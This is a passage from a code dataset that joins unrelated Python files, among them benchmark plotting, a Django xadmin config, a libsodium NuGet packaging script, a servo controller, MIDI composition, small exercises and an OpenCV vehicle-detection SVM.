'.py','w') as archivo:\n archivo.write(str(Cant_medidiones) + \" mediciones de pulsos de reloj de Zigzag c de cátedra sobre imagen \" + nombre + \"\\n\")\n archivo.write(', '.join(map(str,c___catedra_mediciones_Zigzag)))\n archivo.write(\"\\nPromedio = \" + str(c___catedra_promedio_Zigzag))\n archivo.write(\"\\nDesvío estándar = \" + str(c___catedra_desvioEs_Zigzag))\n\nwith open('Medicion_Zigzag_alumnos_' + nombre + '.py','w') as archivo:\n archivo.write(str(Cant_medidiones) + \" mediciones de pulsos de reloj de Zigzag asm de alumnos sobre imagen \" + nombre + \"\\n\")\n archivo.write(', '.join(map(str,asm_alumnos_mediciones_Zigzag)))\n archivo.write(\"\\nPromedio = \" + str(asm_alumnos_promedio_Zigzag))\n archivo.write(\"\\nDesvío estándar = \" + str(asm_alumnos_desvioEs_Zigzag))\n\n\n\n\nOcultar_EjeImplemt = ('C','ASM\\nsin\\noptimizar')\nOcultar_distribucion_Barras = np.arange(len(Ocultar_EjeImplemt))\nOcultar_EjeTiempoPromedio = []\nOcultar_EjeTiempoPromedio.append(c___catedra_promedio_Ocultar)\nOcultar_EjeTiempoPromedio.append(asm_alumnos_promedio_Ocultar)\nOcultar_EjeTiempoDesvioEs = []\nOcultar_EjeTiempoDesvioEs.append(c___catedra_desvioEs_Ocultar)\nOcultar_EjeTiempoDesvioEs.append(asm_alumnos_desvioEs_Ocultar)\n\nplt.rcdefaults()\nfig, ax = plt.subplots()\nplt.barh(Ocultar_distribucion_Barras, Ocultar_EjeTiempoPromedio, xerr=Ocultar_EjeTiempoDesvioEs, align='center')\nplt.yticks(Ocultar_distribucion_Barras)\nax.set_yticklabels(Ocultar_EjeImplemt)\nax.invert_yaxis()\nfor i, v in enumerate(Ocultar_EjeTiempoPromedio):\n ax.text(v+3, i+.25, \"{:.2e}\".format(v) + \"\\n\" +chr(177) + \" \" + \"{:.2e}\".format(Ocultar_EjeTiempoDesvioEs[i])) #str(round(v,-3)) + \"\\n\" +chr(177) + \" \" + str(round(Ocultar_EjeTiempoDesvioEs[i],-3))\nax.set_xlim([0,1200000])\nplt.xlabel('Pulsos de reloj de CPU')\nplt.title('Tiempos de ejecución Ocultar\\n' + Ocultar_nombre + \" en \" + nombre)\nplt.savefig(\"Ocultar.\" + Ocultar_nombre + \".en.\" + nombre + \".jpg\")\n\n\n\n\n\nDescubrir_EjeImplemt = ('C','ASM\\nsin\\noptimizar')\nDescubrir_distribucion_Barras = np.arange(len(Descubrir_EjeImplemt))\nDescubrir_EjeTiempoPromedio = []\nDescubrir_EjeTiempoPromedio.append(c___catedra_promedio_Descubrir)\nDescubrir_EjeTiempoPromedio.append(asm_alumnos_promedio_Descubrir)\nDescubrir_EjeTiempoDesvioEs = []\nDescubrir_EjeTiempoDesvioEs.append(c___catedra_desvioEs_Descubrir)\nDescubrir_EjeTiempoDesvioEs.append(asm_alumnos_desvioEs_Descubrir)\n\nplt.rcdefaults()\nfig, ax = plt.subplots()\nplt.barh(Descubrir_distribucion_Barras, Descubrir_EjeTiempoPromedio, xerr=Descubrir_EjeTiempoDesvioEs, align='center')\nplt.yticks(Descubrir_distribucion_Barras)\nax.set_yticklabels(Descubrir_EjeImplemt)\nax.invert_yaxis()\nfor i, v in enumerate(Descubrir_EjeTiempoPromedio):\n ax.text(v+3, i+.25, \"{:.2e}\".format(v) + \"\\n\" +chr(177) + \" \" + \"{:.2e}\".format(Descubrir_EjeTiempoDesvioEs[i])) #str(round(v,-3)) + \"\\n\" +chr(177) + \" \" + str(round(Descubrir_EjeTiempoDesvioEs[i],-3))\nax.set_xlim([0,1200000])\nplt.xlabel('Pulsos de reloj de CPU')\nplt.title('Tiempos de ejecución Descubrir\\n' + Descubrir_nombre)\nplt.savefig(\"Descubrir.\" + Descubrir_nombre + \".jpg\")\n\n\n\n\nZigzag_EjeImplemt = ('C','ASM\\nsin\\noptimizar')\nZigzag_distribucion_Barras = np.arange(len(Zigzag_EjeImplemt))\nZigzag_EjeTiempoPromedio = []\nZigzag_EjeTiempoPromedio.append(c___catedra_promedio_Zigzag)\nZigzag_EjeTiempoPromedio.append(asm_alumnos_promedio_Zigzag)\nZigzag_EjeTiempoDesvioEs = []\nZigzag_EjeTiempoDesvioEs.append(c___catedra_desvioEs_Zigzag)\nZigzag_EjeTiempoDesvioEs.append(asm_alumnos_desvioEs_Zigzag)\n\nplt.rcdefaults()\nfig, ax = plt.subplots()\nplt.barh(Zigzag_distribucion_Barras, Zigzag_EjeTiempoPromedio, xerr=Zigzag_EjeTiempoDesvioEs, align='center')\nplt.yticks(Zigzag_distribucion_Barras)\nax.set_yticklabels(Zigzag_EjeImplemt)\nax.invert_yaxis()\nfor i, v in enumerate(Zigzag_EjeTiempoPromedio):\n ax.text(v+3, i+.25, \"{:.2e}\".format(v) + \"\\n\" +chr(177) + \" \" + \"{:.2e}\".format(Zigzag_EjeTiempoDesvioEs[i])) #str(round(v,-3)) + \"\\n\" +chr(177) + \" \" + str(round(Zigzag_EjeTiempoDesvioEs[i],-3))\nax.set_xlim([0,1200000])\nplt.xlabel('Pulsos de reloj de CPU')\nplt.title('Tiempos de ejecución Zigzag\\n' + nombre)\nplt.savefig(\"Zigzag.\" + nombre + \".jpg\")\n","sub_path":"tests/4_mediciones.py","file_name":"4_mediciones.py","file_ext":"py","file_size_in_byte":16388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"195568894","text":"import xadmin\n\n\nfrom .models import Post,Category,Tag\nfrom xadmin.views import BaseAdminPlugin,UpdateAdminView,CreateAdminView\n\nfrom xadmin import views\n\n\n\nclass BaseSetting(object):\n enable_themes = True\n use_bootswatch = True\n\n\nclass GlobalSettings(object): \n site_title = \"pyblog后台管理\" #设置头标题\n site_footer = \"pyblog 2018-2019\" #设置脚标题\n # menu_style = \"accordion\"\n\n\nxadmin.site.register(views.BaseAdminView, BaseSetting)\nxadmin.site.register(views.CommAdminView, GlobalSettings)\n\nclass CategoryVerifyRecord(object):\n list_display=['id','name']\n search_fields=['name']\n list_filter=['name']\n relfield_style = \"fk-select\"\n reversion_enable = True\n\nclass TagVerifyRecord(object):\n list_display=['id','name']\n search_fields=['name']\n list_filter=['name']\n relfield_style = \"fk-select\"\n reversion_enable = True\n\nclass PostVerifyRecord(object):\n list_display=['id','title','excerpt','views','category','modified_time']\n search_fields=['title','excerpt','views','category','modified_time']\n list_filter=['title','excerpt','category']\n relfield_style = \"fk-select\"\n reversion_enable = True\n\n \n\n\nclass SimditorPlugin(BaseAdminPlugin):\n\n def get_media(self,media):\n return media\n \n def block_extrahead(self,context,nodes):\n css=''\n css+=''%(self.static('blog/simeditor2.3.16/styles/simditor.css'))\n css+=''%(self.static('blog/simeditor2.3.16/styles/simditor-html.css'))\n css+=''%(self.static('blog/simeditor2.3.16/styles/simditor-markdown.css'))\n js='' % (self.static('blog/simeditor2.3.16/scripts/jquery.min.js'))\n js+='' % (self.static('blog/simeditor2.3.16/scripts/beautify-html.js'))\n js+='' % (self.static('blog/simeditor2.3.16/scripts/marked.js'))\n js+='' % (self.static('blog/simeditor2.3.16/scripts/to-markdown.js'))\n js+='' % (self.static('blog/simeditor2.3.16/scripts/module.js'))\n js+='' % (self.static('blog/simeditor2.3.16/scripts/hotkeys.js'))\n js+='' % (self.static('blog/simeditor2.3.16/scripts/uploader.js'))\n js+='' % (self.static('blog/simeditor2.3.16/scripts/simditor.js'))\n js+='' % (self.static('blog/simeditor2.3.16/scripts/simditor-autosave.js'))\n js+='' % (self.static('blog/simeditor2.3.16/scripts/simditor-html.js'))\n js+='' % (self.static('blog/simeditor2.3.16/scripts/simditor-markdown.js'))\n js+='' % (self.static('blog/simeditor2.3.16/scripts/simditor-textarea.js'))\n nodes.append(css+js)\n\nxadmin.site.register(Category,CategoryVerifyRecord)\nxadmin.site.register(Tag,TagVerifyRecord)\nxadmin.site.register(Post,PostVerifyRecord)\n\n#加入编辑器插件\nxadmin.site.register_plugin(SimditorPlugin,CreateAdminView)\nxadmin.site.register_plugin(SimditorPlugin,UpdateAdminView)","sub_path":"blog/adminx.py","file_name":"adminx.py","file_ext":"py","file_size_in_byte":3618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"503246958","text":"#!/usr/bin/python3\n\nimport datetime\nimport json\nimport os.path\nimport sys\nimport xml.etree.ElementTree as ET\n\n#\n# OUTPUT CONFIGURATION\n#\n\n# Package metadata\nNUPKG_ID = 'libsodium'\nNUPKG_VERSION = '1.0.11'\n\n# The names of the libsodium binaries in the package\nLIBSODIUM_DLL = 'libsodium.dll'\nLIBSODIUM_DYLIB = 'libsodium.dylib'\nLIBSODIUM_SO = 'libsodium.so'\n\n#\n# INPUT CONFIGURATION\n#\n\n# The archives to download\nWIN_FILE = 'libsodium-1.0.11-msvc.zip'\nDEB_FILE = 'libsodium18_1.0.11-1_amd64.deb'\nRPM_FILE = 'libsodium18-1.0.11-14.1.x86_64.rpm'\nOSX_FILE = 'libsodium-1.0.11.{0}.bottle.tar.gz'\n\n# The URLs of the archives\nOFFICIAL_URL = 'https://download.libsodium.org/libsodium/releases/{0}'\nOPENSUSE_URL = 'http://download.opensuse.org/repositories/home:/nsec/{0}/{1}/{2}'\nHOMEBREW_URL = 'https://bintray.com/homebrew/bottles/download_file?file_path={0}'\n\n# The files within the archives to extract\nWIN_LIB = '{0}/Release/v140/dynamic/libsodium.dll'\nDEB_LIB = './usr/lib/x86_64-linux-gnu/libsodium.so.18.1.1'\nRPM_LIB = './usr/lib64/libsodium.so.18.1.1'\nOSX_LIB = 'libsodium/1.0.11/lib/libsodium.18.dylib'\n\n# Commands to extract a file from an archive\nDEB_EXTRACT = 'ar -p {0} data.tar.xz | tar xJ \"{1}\"'\nRPM_EXTRACT = 'rpm2cpio {0} | cpio -i \"{1}\"'\nTAR_EXTRACT = 'tar xzf {0} \"{1}\"'\nZIP_EXTRACT = 'unzip {0} \"{1}\"'\n\n# The inputs\nINPUTS = [\n\n ( 'win10-x64',\n WIN_FILE,\n OFFICIAL_URL.format(WIN_FILE),\n WIN_LIB.format('x64'),\n ZIP_EXTRACT,\n LIBSODIUM_DLL),\n\n ( 'win10-x86',\n WIN_FILE,\n OFFICIAL_URL.format(WIN_FILE),\n WIN_LIB.format('Win32'),\n ZIP_EXTRACT,\n LIBSODIUM_DLL),\n\n ( 'debian.8-x64',\n DEB_FILE,\n OPENSUSE_URL.format('Debian_8.0', 'amd64', DEB_FILE),\n DEB_LIB,\n DEB_EXTRACT,\n LIBSODIUM_SO),\n\n ( 'ubuntu.14.04-x64',\n DEB_FILE,\n OPENSUSE_URL.format('xUbuntu_14.04', 'amd64', DEB_FILE),\n DEB_LIB,\n DEB_EXTRACT,\n LIBSODIUM_SO),\n\n ( 'ubuntu.16.04-x64',\n DEB_FILE,\n OPENSUSE_URL.format('xUbuntu_16.04', 'amd64', DEB_FILE),\n DEB_LIB,\n DEB_EXTRACT,\n LIBSODIUM_SO),\n\n ( 'ubuntu.16.10-x64',\n DEB_FILE,\n OPENSUSE_URL.format('xUbuntu_16.10', 'amd64', DEB_FILE),\n DEB_LIB,\n DEB_EXTRACT,\n LIBSODIUM_SO),\n\n ( 'centos.7-x64',\n RPM_FILE,\n OPENSUSE_URL.format('CentOS_7', 'x86_64', RPM_FILE),\n RPM_LIB,\n RPM_EXTRACT,\n LIBSODIUM_SO),\n\n ( 'fedora.23-x64',\n RPM_FILE,\n OPENSUSE_URL.format('Fedora_23', 'x86_64', RPM_FILE),\n RPM_LIB,\n RPM_EXTRACT,\n LIBSODIUM_SO),\n\n ( 'fedora.24-x64',\n RPM_FILE,\n OPENSUSE_URL.format('Fedora_24', 'x86_64', RPM_FILE),\n RPM_LIB,\n RPM_EXTRACT,\n LIBSODIUM_SO),\n\n ( 'fedora.25-x64',\n RPM_FILE,\n OPENSUSE_URL.format('Fedora_25', 'x86_64', RPM_FILE),\n RPM_LIB,\n RPM_EXTRACT,\n LIBSODIUM_SO),\n\n ( 'opensuse.42.1-x64',\n RPM_FILE,\n OPENSUSE_URL.format('openSUSE_Leap_42.1', 'x86_64', RPM_FILE),\n RPM_LIB,\n RPM_EXTRACT,\n LIBSODIUM_SO),\n\n ( 'opensuse.42.2-x64',\n RPM_FILE,\n OPENSUSE_URL.format('openSUSE_Leap_42.2', 'x86_64', RPM_FILE),\n RPM_LIB,\n RPM_EXTRACT,\n LIBSODIUM_SO),\n\n ( 'rhel.7-x64',\n RPM_FILE,\n OPENSUSE_URL.format('RHEL_7', 'x86_64', RPM_FILE),\n RPM_LIB,\n RPM_EXTRACT,\n LIBSODIUM_SO),\n\n ( 'osx.10.10-x64',\n OSX_FILE.format('yosemite'),\n HOMEBREW_URL.format(OSX_FILE.format('yosemite')),\n OSX_LIB,\n TAR_EXTRACT,\n LIBSODIUM_DYLIB),\n\n ( 'osx.10.11-x64',\n OSX_FILE.format('el_capitan'),\n HOMEBREW_URL.format(OSX_FILE.format('el_capitan')),\n OSX_LIB,\n TAR_EXTRACT,\n LIBSODIUM_DYLIB),\n\n ( 'osx.10.12-x64',\n OSX_FILE.format('sierra'),\n HOMEBREW_URL.format(OSX_FILE.format('sierra')),\n OSX_LIB,\n TAR_EXTRACT,\n LIBSODIUM_DYLIB),\n\n]\n\n# The version cookie\nCOOKIE_FILE = 'version.json'\n\n#\n# INTERMEDIATE FILES\n#\n\nCACHEDIR = 'cache'\nTEMPDIR = 'build'\n\n#\n# DO NOT EDIT BELOW THIS LINE\n#\n\nclass Item:\n def __init__(self, input, cachedir, tempdir):\n rid, archive, url, file, extract, lib = input\n\n self.rid = rid\n self.archive = archive\n self.url = url\n self.file = file\n self.extract = extract\n self.lib = lib\n\n self.cachefile = os.path.join(cachedir, rid, archive)\n self.sourcedir = os.path.join(tempdir, rid)\n self.sourcefile = os.path.join(tempdir, rid, os.path.normpath(file))\n self.targetfile = os.path.join('runtimes', rid, 'native', lib)\n\ndef create_nuspec(template, nuspec, version, items):\n tree = ET.parse(template)\n package = tree.getroot()\n metadata = package.find('metadata')\n metadata.find('version').text = version\n files = package.find('files')\n for item in items:\n ET.SubElement(files, 'file', src=item.sourcefile, target=item.targetfile).tail = '\\n'\n tree.write(nuspec, 'ascii', '')\n\ndef create_makefile(makefile, nupkg, nuspec, items):\n with open(makefile, 'w') as f:\n for item in items:\n f.write('FILES += {0}\\n'.format(item.sourcefile))\n f.write('\\n')\n f.write('{0}: {1} $(FILES)\\n\\tdotnet nuget pack $<\\n'.format(nupkg, nuspec))\n for item in items:\n f.write('\\n')\n f.write('{0}:\\n\\t@mkdir -p $(dir $@)\\n\\tcurl -f#Lo $@ \"{1}\"\\n'.format(item.cachefile, item.url))\n for item in items:\n f.write('\\n')\n f.write('{0}: {1}\\n\\t@mkdir -p $(dir $@)\\n\\tcd {2} && {3}\\n'.format(\n item.sourcefile,\n item.cachefile,\n item.sourcedir,\n item.extract.format(os.path.relpath(item.cachefile, item.sourcedir), item.file)))\n\ndef make_prerelease_version(version, suffix, cookie_file):\n cookies = dict()\n if os.path.isfile(cookie_file):\n with open(cookie_file, 'r') as f:\n cookies = json.load(f)\n cookie = cookies.get(suffix, '---').split('-')\n year, month, day, *rest = datetime.datetime.utcnow().timetuple()\n major = '{0:03}{1:02}'.format(year * 12 + month - 23956, day)\n minor = int(cookie[3]) + 1 if cookie[:3] == [version, suffix, major] else 1\n result = '{0}-{1}-{2}-{3:02}'.format(version, suffix, major, minor)\n cookies[suffix] = result\n with open(cookie_file, 'w') as f:\n json.dump(cookies, f, indent=4, sort_keys=True)\n return result\n\ndef main(args):\n if len(args) > 2 or len(args) > 1 and not args[1].isalpha:\n print('usage: {0} [label]'.format(os.path.basename(args[0])))\n sys.exit(1)\n\n version = NUPKG_VERSION\n\n if len(args) > 1:\n suffix = args[1].lower()\n else:\n suffix = 'preview'\n\n if suffix != 'release':\n version = make_prerelease_version(version, suffix, COOKIE_FILE)\n print('updated', COOKIE_FILE)\n\n template = NUPKG_ID + '.nuspec'\n nuspec = NUPKG_ID + '.' + version + '.nuspec'\n nupkg = NUPKG_ID + '.' + version + '.nupkg'\n\n tempdir = os.path.join(TEMPDIR, version)\n items = [Item(input, CACHEDIR, tempdir) for input in INPUTS]\n\n create_nuspec(template, nuspec, version, items)\n print('created', nuspec)\n\n create_makefile('Makefile', nupkg, nuspec, items)\n print('created', 'Makefile', 'to make', nupkg)\n\nif __name__ == '__main__':\n main(sys.argv)\n","sub_path":"packaging/dotnet-core/prepare.py","file_name":"prepare.py","file_ext":"py","file_size_in_byte":6919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"591810809","text":"\n# Control servo motor\n# SImply run servo motor for \"jigging_time\"\n# Then pause servo motor for \"stopped_percent\"\n\nimport time\nimport wiringpi\n\nclass Servo:\n def __init__(self, brainz=None, verbose=False):\n self.verbose = verbose\n self.brainz = brainz\n self.started = False\n self.cycle_time = 0\n self.cycle_to = brainz.jigging_time * (100 - brainz.stopped_percent) / 100\n self.stopped = False\n\n def __print(self, str):\n if self.verbose:\n print (str)\n\n def start(self):\n self.started = True\n # use 'GPIO naming'\n wiringpi.wiringPiSetupGpio()\n # set #18 to be a PWM output\n wiringpi.pinMode(18, wiringpi.GPIO.PWM_OUTPUT)\n # set the PWM mode to milliseconds stype\n wiringpi.pwmSetMode(wiringpi.GPIO.PWM_MODE_MS)\n # divide down clock\n wiringpi.pwmSetClock(192)\n wiringpi.pwmSetRange(2000)\n\n def stop(self):\n self.started = False\n\n def tick(self,interval):\n self.__print(\"Hei\")\n self.__print(self.started)\n if not self.started:\n return\n if self.stopped:\n self.__print(\"Stopped\")\n wiringpi.pwmWrite(18, 169)\n else:\n self.__print(\"Move\")\n wiringpi.pwmWrite(18, 175)\n\n self.cycle_time += interval\n\n if self.cycle_time >= self.cycle_to:\n self.cycle_time = 0\n self.stopped = not self.stopped\n if self.stopped:\n self.cycle_to = self.brainz.jigging_time * self.brainz.stopped_percent / 100\n else:\n self.cycle_to = self.brainz.jigging_time * (100 - self.brainz.stopped_percent) / 100\n","sub_path":"servo.py","file_name":"servo.py","file_ext":"py","file_size_in_byte":1701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"462239290","text":"from collections import Counter\nfrom operator import itemgetter\nclass Solution(object):\n def frequencySort(self, s):\n \"\"\"\n :type s: str\n :rtype: str\n \"\"\"\n counter = Counter(s)\n\n sorted_chrs = sorted(counter.items(), key=itemgetter(1), reverse=True)\n\n sorted_by_freq = list(map(itemgetter(0), sorted_chrs))\n result = []\n for c in sorted_by_freq:\n result.extend([c] * counter[c])\n\n return ''.join(result)\n\nstr1 = 'tree'\nresult = Solution().frequencySort(str1)\nprint(result)\n\n","sub_path":"sort-characters-by-frequency/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"133914152","text":"import random\n\n# 미션1: 키를 이용한 정렬 예제\nclass Person:\n def __init__(self, name, age):\n self.name = name\n self.age = age\n\n def __repr__(self):\n return repr('<이름: %s, 나이: %d>' % (self.name, self.age))\n\naddressBook = [\n Person('최자영', 38),\n Person('김철수', 35),\n Person('홍길동', 20)\n]\n\naddressBook.sort(key=lambda address: address.age)\nprint(addressBook)\n\n# 미션2: 피보나치 이터레이터\nclass FibIterator:\n def __init__(self, a=1, b=0, maxValue=50):\n self.a = a\n self.b = b\n self.maxValue = maxValue\n\n def __iter__(self):\n return self\n\n def __next__(self):\n n = self.a + self.b\n if n > self.maxValue:\n raise StopIteration()\n self.a = self.b\n self.b = n\n return n\n\nfor i in FibIterator():\n print(i, end=\" \")\nprint()\n\n# 미션3: 동전 던기지 게임\narr = [\"head\", \"tail\"]\n\nwhile True:\n answer = input(\"동전 던지기를 계속하시겠습니까?(yes, no) \")\n if answer == 'no' or (not answer == 'no' and not answer == 'yes'):\n break\n print(random.choice(arr))","sub_path":"2018037010_11.py","file_name":"2018037010_11.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"381574348","text":"# -*- coding: utf-8 -*-\nfrom nose.tools import assert_equal\nfrom nose_config import set_rest, load_from_json, json_is_valid\n\n\n# ---------------------TESTS---------------------#\ndef test_programs_get_rest():\n r = rest.program.get_list()\n assert_equal(r[0], 200, 'CODE 200')\n schema = load_from_json(\"data/json_schemas/programs.json\")\n v = json_is_valid(r[1], schema)\n assert_equal(v[0], True, v[1])\n\n\ndef test_programs_get_current_next():\n r = rest.program.get_current_next()\n assert_equal(r[0], 200, 'CODE 200')\n schema = load_from_json(\"data/json_schemas/programs_current_next.json\")\n v = json_is_valid(r[1], schema)\n assert_equal(v[0], True, v[1])\n\n\ndef test_programs_get_on_demand():\n r = rest.program.get_on_demand_next()\n assert_equal(r[0], 200, 'CODE 200')\n schema = load_from_json(\"data/json_schemas/programs_on_demand.json\")\n v = json_is_valid(r[1], schema)\n assert_equal(v[0], True, v[1])\n\n\ndef setup_module():\n global rest\n rest = set_rest()\n\n","sub_path":"tests/test_programs_rest.py","file_name":"test_programs_rest.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"158837875","text":"'''\nCreated on Aug 2, 2014\nmodified from the single-note-example form midiutil\n@author: darius\n'''\n############################################################################\n# A sample program to create a multi-track MIDI file, add notes,\n# and write to disk.\n############################################################################\n\n#Import the library\nfrom MidiFile3 import MIDIFile\nimport testgui\n\n# Create the MIDIFile Object\nMyMIDI = MIDIFile(2) ### the integer = the number of parallel tracks available\n\n# Add track names and tempo. The first argument to addTrackName and\n# addTempo is the time to write the event. This initialises the tracks.\ntracks = (0, 1)\nstart_time = 0\n\nMyMIDI.addTrackName(tracks[0],start_time,\"Piano\")\nMyMIDI.addTempo(tracks[0],start_time, 120)\n#MyMIDI.addTrackName(tracks[1],start_time,\"Cello\")\n#MyMIDI.addTempo(tracks[1],start_time, 120)\n\n# Each track can hold multiple channels, we'll use two for now\nchannels = (0,1)\n\n# Add a note. addNote expects the following information:\n#channel = some integer >= 0\n#pitch = some integer >= 0 ... middle C = 60\n#duration = 1 corresponds to a crotchet, aka a quarter note\n#volume = 100\nvolume = Window.volume_data # may as well specify this here for now\n\n# Now add the note.\n# MyMIDI.addNote(track,channel,pitch,note_start_time,duration,volume)\nclass compose:\n def __init__(self):\n self.treble_loc = start_time\n self.bass_loc = start_time\n# self.octave = dict([('C',60),('D',62),('E',64),('F',65),\n# ('G',67),('A',69),('B',71),\n# ('C#',61),('D#',63),('F#',66),('G#',68),('A#',70),\n# ('Db',61),('Eb',63),('Gb',66),('Ab',68),('Bb',70)])\n\n def add2treble(self, pitch, length):\n MyMIDI.addNote(tracks[0],channels[0],pitch,self.treble_loc,length,volume)\n self.treble_loc += length # moving to next time to start a note\n def add2bass(self, pitch, length):\n MyMIDI.addNote(tracks[0],channels[1],pitch,self.bass_loc,length,volume)\n self.bass_loc += length # moving to next time to start a note\n\ncomposition = compose()\ncomposition.add2treble(64, 1)\ncomposition.add2treble(62, 1)\ncomposition.add2treble(60, 2)\ncomposition.add2bass(48, 1)\ncomposition.add2bass(55, 1)\ncomposition.add2bass(48, 2)\n\nprint(str(volume))\n\n# And write it to disk.\nbinfile = open(\"output.mid\", 'wb')\nMyMIDI.writeFile(binfile)\nbinfile.close()\n\n","sub_path":"classical_optimism.py","file_name":"classical_optimism.py","file_ext":"py","file_size_in_byte":2424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"638157553","text":"#!/Library/Frameworks/Python.framework/Versions/3.5/bin/python3\n\n# create a 300x300 canvas.\n# create a square drawing function that takes 1 parameter:\n# the square size\n# and draws a square of that size to the center of the canvas.\n# draw 3 squares with that function.\n\nfrom tkinter import *\nroot = Tk()\n\nsize = 300\ncanvas = Canvas(root, width=size, height=size)\ncanvas.pack()\n\n\ndef square_drawing(x):\n canvas.create_rectangle(size/2 - x/2, size/2 - x/2, size/2 + x/2, size/2 + x/2, fill=\"green\")\n print (size/2-x)\n print (size/2)\n\n\nsquare_drawing(120)\nsquare_drawing(50)\nsquare_drawing(20)\n\n\nroot.mainloop()\n","sub_path":"week-04/day-3/09.py","file_name":"09.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"17319982","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun May 14 18:53:35 2017\r\n\r\n@author: Anton Varfolomeev\r\n\"\"\"\r\n\r\nimport matplotlib.image as mpimg\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport pickle\r\nimport time\r\nimport cv2\r\nfrom scipy.ndimage.measurements import label\r\n\r\n\r\n# Set up SVM from OpenCV 3\r\ndef cv_svm (X_train, X_test, y_train, y_test):\r\n C=0.8\r\n kernel = 'rbf'\r\n gamma = 6.5e-4\r\n\r\n t=time.time()\r\n \r\n svm = cv2.ml.SVM_create()\r\n # Set SVM type\r\n svm.setType(cv2.ml.SVM_C_SVC)\r\n # Set SVM Kernel to Radial Basis Function (RBF) \r\n svm.setKernel(cv2.ml.SVM_RBF)\r\n # Set parameter C\r\n svm.setC(C)\r\n # Set parameter Gamma\r\n svm.setGamma(gamma)\r\n \r\n # Train SVM on training data \r\n svm.train(X_train, cv2.ml.ROW_SAMPLE, y_train)\r\n\r\n t2 = time.time()\r\n \r\n # Save trained model \r\n svm.save(\"./models/u_svm_model.yml\");\r\n \r\n # Test on a held out test set\r\n testResponse = svm.predict(X_test)[1].ravel()\r\n accuracy = 1-sum(np.abs(testResponse-y_test))/y_test.size\r\n\r\n\r\n print(round(t2-t, 2), 'Seconds to train cv2.SVM...')\r\n # Check the score of the SVC\r\n print('Test Accuracy of cv2.SVM = ', round(accuracy, 4))\r\n return svm\r\n \r\ndef score (svm, X_test, y_test):\r\n testResponse = svm.predict(X_test)[1].ravel()\r\n accuracy = 1-sum(np.abs(testResponse-y_test))/y_test.size\r\n return accuracy\r\n\r\n#%%\r\n# Define a single function that can extract features using hog sub-sampling and make predictions\r\ndef find_cars(img, ystart, ystop, scale, svc, X_scaler, orient, pix_per_cell, \r\n cell_per_block, spatial_size, cells_per_step):\r\n global hot_features\r\n global patches\r\n \r\n \r\n img_tosearch = img[ystart:ystop,:,:]\r\n ctrans_tosearch = cv2.cvtColor(img_tosearch, cv2.COLOR_RGB2HLS)\r\n if scale != 1:\r\n imshape = ctrans_tosearch.shape\r\n ctrans_tosearch = cv2.resize(ctrans_tosearch, (np.int(imshape[1]/scale), np.int(imshape[0]/scale)))\r\n \r\n ch1 = ctrans_tosearch[:,:,0]\r\n ch2 = ctrans_tosearch[:,:,1]\r\n ch3 = ctrans_tosearch[:,:,2]\r\n\r\n # Define blocks and steps as above\r\n nxblocks = (ch1.shape[1] // pix_per_cell) - cell_per_block + 1\r\n nyblocks = (ch1.shape[0] // pix_per_cell) - cell_per_block + 1 \r\n nfeat_per_block = orient*cell_per_block**2\r\n \r\n # 64 was the orginal sampling rate, with 8 cells and 8 pix per cell\r\n window = spatial_size\r\n win_draw = np.int(window*scale)\r\n\r\n nblocks_per_window = (window // pix_per_cell) - cell_per_block + 1\r\n #cells_per_step = 2 # Instead of overlap, define how many cells to step\r\n nxsteps = (nxblocks - nblocks_per_window) // cells_per_step + 1\r\n nysteps = (nyblocks - nblocks_per_window) // cells_per_step + 1\r\n \r\n # size of one hog vector\r\n hogSize = nblocks_per_window * nblocks_per_window * cell_per_block * cell_per_block * orient\r\n\r\n #define shape for target matrices\r\n hogShape = (nysteps, nxsteps, hogSize)\r\n # Compute individual channel HOG features for the entire image\r\n #done hog_cv.compute (ch1, (16,16))\r\n hog1 = get_hog_features(ch1, orient, pix_per_cell, cell_per_block, window, cells_per_step).reshape(hogShape)\r\n hog2 = get_hog_features(ch2, orient, pix_per_cell, cell_per_block, window, cells_per_step).reshape(hogShape)\r\n hog3 = get_hog_features(ch3, orient, pix_per_cell, cell_per_block, window, cells_per_step).reshape(hogShape)\r\n \r\n #patches = np.zeros((nysteps, nxsteps, window, window,3),np.uint8)\r\n boxes = np.zeros((nxsteps*nysteps,2,2), np.int32)\r\n bboxes = []\r\n features = np.zeros((nxsteps*nysteps, hogSize*3), np.float32)\r\n #todo: loop\r\n for yb in range(nysteps):\r\n for xb in range(nxsteps):\r\n # Extract HOG for this patch\r\n \r\n ypos = yb*cells_per_step\r\n xpos = xb*cells_per_step\r\n\r\n xleft = xpos*pix_per_cell\r\n ytop = ypos*pix_per_cell\r\n \r\n \r\n # Extract HOG for this patch\r\n hog_feat1 = hog1[yb, xb]\r\n hog_feat2 = hog2[yb, xb]\r\n hog_feat3 = hog3[yb, xb]\r\n hog_features = np.hstack((hog_feat1, hog_feat2, hog_feat3))\r\n\r\n # Extract the image patch\r\n #subimg = ctrans_tosearch[ytop:ytop+window, xleft:xleft+window]\r\n #patches[yb,xb] = subimg\r\n \r\n # Get color features\r\n #spatial_features = bin_spatial(subimg, size=spatial_size)\r\n #hist_features = color_hist(subimg, nbins=hist_bins)\r\n\r\n # Scale features and make a prediction\r\n features[yb*nxsteps + xb] = (X_scaler.transform(hog_features.reshape(1,-1)))\r\n boxes[yb*nxsteps + xb] = ((xleft*scale, ytop*scale + ystart), \r\n ((xleft+window)*scale, (ytop+window)*scale+ystart))\r\n #test_features = X_scaler.transform(np.hstack((shape_feat, hist_feat)).reshape(1, -1)) \r\n 